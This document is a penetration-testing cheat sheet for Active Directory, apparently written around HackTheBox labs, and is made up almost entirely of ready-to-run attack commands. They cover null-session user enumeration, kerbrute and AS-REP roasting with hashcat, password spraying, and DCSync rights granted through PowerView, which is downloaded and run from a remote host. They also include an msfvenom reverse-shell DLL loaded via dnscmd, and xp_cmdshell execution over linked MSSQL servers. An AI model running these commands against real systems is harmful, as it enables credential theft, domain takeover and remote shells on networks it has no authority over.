# Active Directory ( Recon -> PE) ## Enumeration > Enumeration is the key * Enumerate Usernames from every possible area * RPC * SMB * LDAP * Web Servers * HTTPS/SSL Certificates * WinRM possibly??? * Enumerate via SID's ## Default Checklists * Check for anonymous, guest and null sessions on the open services * RPC ```bash * rpcclient -U '' -N 10.10.10.10 -c 'enumdomusers' ``` * SMB ```bash * smbclient -N -U '' -L 10.10.10.10 * cme smb -u 'anonymous' -p 'anonymous' --shares * cme smb -u 'Guest' -p '' --shares * cme smb -u 'Guest' -p '' --rid-brute ``` * LDAP ```bash * ldapsearch -h $ip -x -s base namingcontexts * ldapsearch -h $ip -x -b "DC=domain,DC=tld" '(objectClass=person)' * windapsearch -d domain.tld -u '' -p '' -m users ``` * Web Servers `Enumerate users from contat page, members page etc..` * SSL Certificates ```bash * Organization Name * Possibly an registered admin name ???? ``` * Enumerate via SID's ```bash * lookupsid.py anonymous@10.10.10.10 -no-pass * lookupsid.py guest@10.10.10.10 -no-pass ``` ## Identify * After enumerating all the user names its time to identify which users are registered as a part of the network we are testing * This can be done with kerbrute ```bash # add domain name form nmap output to /etc/hosts file kerbrute userenum -d domainname --dc domainname usernames.txt -o valid_users.txt ``` * Now with the valid users filter out the output and save its output to a new file ```bash cat valid_users.txt | awk '{print $7}' > users ``` * With the user names in hand, we can enumerate which user account is configured with `DONOT REQUIRE KERBEROS PREAUTH` with `GetNPUsers.py` from impackets which outputs an TGT ticket to the hacker which can be cracked to obtain the password of that user ```bash GetNPUsers.py -usersfile users -outputfile hash -dc-ip 10.10.10.10 domain.tld/ hashcat -m -m 18200 hash /usr/share/wordlists/rockyou.txt --force ``` ## Enumerate Again * Once the valid credentials of the network user is obtained, enumerate the services once again as an authenticated user * SMB ``` * crackmapexec smb 10.10.10.10 -u 'user' -p 'password' --shares * smbclient -u 'user' \\10.10.10.10\share ``` * RPC ```bash * rpcclient -u 'user%password' 10.10.10.10 ``` * WinRM ```bash * evil-winrm -i 10.10.10.10 -u 'user' -p 'password' ``` * LDAP ```bash * windapsearch -d domain.tld -u 'user' -p 'password' -m users # choose any module ``` ## Password Spraying * CME ```bash cme smb 10.10.10.10 -u user.txt -p 'password' --continue-on-success ``` ## Network Enumeration * Once these doesnt provide any useful information since we have the credentials of the network user we can query the network with bloodhound to obtain information which can help us in the exploitation ```bash bloodhound-python -c all -u 'user' -p 'password' -d domain.tld -ns 10.10.10.10 ``` ### BloodHound Permissions * **WriteOwner** - * **GetChanges/GetChangesAll** - * **WriteDACL** * On the domain - ```powershell # This is ippsec's method 0xdf used a oneliner iex(iwr -uri http://10.10.10.10/PowerView.ps1 -usebasicparsing) $SecPassword = ConvertTo-SecureString 'ippsec123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('HTB\dnoscp', $SecPassword) Add-DomainObjectACL -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity "dnoscp" -Rights DCSync ``` ### Active Directory Recycle Bin * Get Information about deleted objects ```powershell Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects Get-ADObject -Filter { SAMAccountName -eq "TempAdmin" } -includeDeletedObjects -property * ``` #### Machine * Cascade - ## Group Exploitation ### DNSAdmins * Members of DNS Admins can add dlls to the server which can be exploited to obtain reverse shell ```bash msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f dll > privesc.dll impacket-smbserver share . dnscmd.exe 127.0.0.1 /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll sc.exe stop dns sc.exe start dns ``` #### Machine * Resolute - ## Post Exploit * Get Domain Information ```bash [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() ``` * Automated Enumeration ```bash # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 powershell.exe -c "Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks" ``` ## Database Enumeration ```bash # https://github.com/NetSPI/PowerUpSQL Get-SQLServerLink -Instance server -Verbose powershell.exe -c "Import-Module C:\Users\Public\PowerUpSQL.ps1; Invoke-SQLEscalatePriv -Verbose -Instance ECORP\sql" # To see servers select srvname from master..sysservers; # Native Get-SQLServerLinkCrawl -Instance server -Query "exec master..xp_cmdshell 'whoami'" # Linked database tables select * from openquery("ECORP\FOO", 'select TABLE_NAME from FOO.INFORMATION_SCHEMA.TABLES') # You can also use meterpreter module exploit/windows/mssql/mssql_linkcrawler # With meterpreter module you can find linked databases and if you are admin on them # You can do a query and try to enable xp_cmpshell on that server select * from openquery("server",'select * from master..sysservers') EXECUTE AS USER = 'internal_user' ('sp_configure "xp_cmdshell",1;reconfigure;') AT "server" ``` * Offensive enumeration methods :thumbsup::thumbsup::thumbsup::thumbsup::thumbsup: